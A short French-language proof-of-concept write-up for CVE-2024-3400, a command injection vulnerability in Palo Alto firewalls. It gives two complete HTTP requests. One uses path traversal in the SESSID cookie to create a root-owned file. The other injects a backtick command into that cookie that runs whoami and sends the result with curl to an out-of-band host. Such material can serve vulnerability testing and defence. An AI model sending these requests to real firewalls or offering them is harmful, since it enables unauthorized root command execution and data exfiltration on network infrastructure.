
Preuve de concept d'exploitation pour CVE-2024-3400, une vulnérabilité d'injection de commandes dans les pare-feu Palo Alto, démontrant la création de fichiers et l'exécution de commandes à distance via des requêtes HTTP spécialement conçues.
CVE-2024-3400 est une vulnérabilité d'injection de commandes présente dans le système de pare-feu Palo Alto. En envoyant une requête HTTP spécialement conçue, un attaquant peut exécuter des commandes malveillantes sur le serveur cible, voire obtenir les privilèges root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Après l'envoi de cette requête, un fichier nommé hellome1337.txt sera créé sur le serveur, et ce fichier disposera des privilèges root.
La capture d'écran illustre l'effet de l'exploitation de cette vulnérabilité :


Pour exploiter cette vulnérabilité afin d'effectuer une injection de commandes, vous pouvez envoyer la requête HTTP suivante :
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Cette requête exécute la commande whoami sur le serveur et envoie le résultat au serveur distant spécifié (par exemple : xxxxxxxxxxxxxxxxx.oast.fun).